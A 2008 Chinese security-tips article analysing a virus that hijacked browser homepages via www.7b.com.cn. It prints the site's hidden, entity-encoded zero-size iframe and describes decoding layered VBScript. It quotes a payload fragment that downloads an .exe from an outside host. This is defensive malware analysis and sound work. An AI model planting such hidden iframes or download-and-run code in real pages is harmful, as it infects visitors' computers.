注册本站  论坛  繁體中文

电脑技巧
手机 | MP3 | MP4 | 显卡 | 主板 | 显示器 | 光存储 | 笔记本 | 网络设备 | 移动存储 | 数码相机
键鼠 | CPU | 音箱 | GPS | 电视 | 服务器 | 投影机 | 机箱电源 | 品牌电脑 | 办公打印 |
| 网站首页 | Cisco | Windows | Linux | Java | Dotnet | Oracle | 网页设计 | 平面设计 | 安全 | 软件应用 | 电脑维修 | 办公维修 |
您现在的位置: 电脑技巧 >> 安全 >> 网络安全 >> 安全正文

黑客是如何做到锁定用户的浏览器首页

文章来源:网页教学网收集整理 作者:佚名 更新时间:2008-3-20 14:18:45 【 】 【加入收藏
  前不久,很多网友都感染了www.7b.com.cn的病毒,首页被改成这个网站,并且无法改回。黑客是如何做到锁定用户的浏览器首页呢?下面我们就去探个究竟。

 

  提醒:分析病毒存在一定风险,建议在虚拟机下操作。

  第一步 查看www.7b.com.cn首页的源代码,可以发现在尾部有如下的字样:

  <iframe src=&#104&#116&#116&#112&#58&#47&#47&#109&#46&#100&#97&#115&#104&#111&#119&#46&#99&#111&#109&#46&#99&#110&#47&#109&#46&#104&#116&#109&#108 width=0 height=0></iframe>

  这是一个嵌入到7b网址之家首页的页面,即打开www.7b.com.cn也就同时打开了这个页面。

  而“&#104&#116&#116&#112&#58&#47&#47&#109&#46&#100&#97&#115&#104&#111&#119&#46&#99&#111&#109&#46&#99&#110&#47&#109&#46&#104&#116&#109&#108”表示的是一个字符串,“&#”后面是每个字符串ASCII的十进制值。

  直接把这段乱码保存为HTM文件,用IE打开,就可以看到它的真实面目“http://m.dashow.com.cn/m.html”。

  第二步 查看http://m.dashow.com.cn/m.html的源代码,把看的<scrtipt>脚本段中的Execute替换为Document.Write,然后打开这个HTM页面,就会出现一段代码,同样地,把EXECUTE换成我们无敌的Document.Write,前后加脚本标记,存HTM打开。屏幕上立即出现了一段令人眼花的东西。把眼花缭乱的东西整理一下,并将出现的CHR()在前面用到过,作用是把字符的ASCII转成字符,只不过这次是16进制。然后再将字符拼接成字符串,然后再Execute运行这个命令字符串。继续用Document.Write替换掉EXECUTE,前后加脚本标记,存HTM打开。

  第三步 经过上几步的还原后终于看到了这个恶意页面的最终面目。

  on error resume next curl = "http://m.dashow.com.cn/start.exe"……其后省略。

  这段代码中我们可以很清楚地看到http://m.dashow.com.cn/start.exe这个链接。没错,它就是运行后可以将用户主页锁定为www.7b.com.cn的病毒。

  可以用下载工具将这个文件下载下来,如果你的杀毒软件查不到的话最好立即上报。这样可以保证杀毒软件快速查杀这个病毒,并使更少的网友免受该病毒的侵害。

  • 上一篇安全:

  • 下一篇安全:
  • 最 新 热 门
     磁碟机木马(dummycom)的查杀方法
     机器中毒后的一些紧急处理措施
     保护IE,防止恶意修改和攻击
     游戏木马和代理木马传播迅速
     世界之窗对卡巴斯基表示愤慨
     卡巴斯基通过2008软件认证
     卡巴斯基发布中国地区2008年二十大恶意软件…
     卡巴斯基的扫描功能相关问题解析
     预先付费骗局让聪明人更容易相信
     网上购物 网络购物陷阱要预防
    最 新 推 荐
     预先付费骗局让聪明人更容易相信
     网上购物 网络购物陷阱要预防
     IE浏览器RealPlayer的安全漏洞
     “网游盗号木马”将成为新毒王
     微软漏洞补丁阻止防溢出者病毒
     U盘病毒预防的一个小技巧
     7939上网导航病毒的解决方法
     黑客是如何做到锁定用户的浏览器首页
     小技巧:配置不同网络参数
     常见的网络钓鱼作案的七种手法
    相 关 文 章

    黑客神通广大 iPhone 2.0未面世已遭破解
    知已知彼 黑客侦察目标的几种常用技术
    手把手教你打造黑客也读不懂的安全密码
    使电脑远离黑客的骚扰
    黑客侦察目标的常用几种技术
    制作连黑客都不懂的密码
    迅雷被疑有黑客行为:私自上传用户文件
    保护计算机远离黑客骚扰的策略
    下载电影两成带毒 钓鱼黑客藏身三类网站
    黑客谈免杀 简单分析特征码修改技术

    | 设为首页 | 加入收藏 | 联系站长 | 友情链接 | 版权申明 | 网站公告

     

    Copyright 2006-2008 pcjx.com All Rights Reserved
    电脑技巧 版权所有 粤ICP备06059145号 地图
    本网站所有内容未经许可不得转载或做其他使用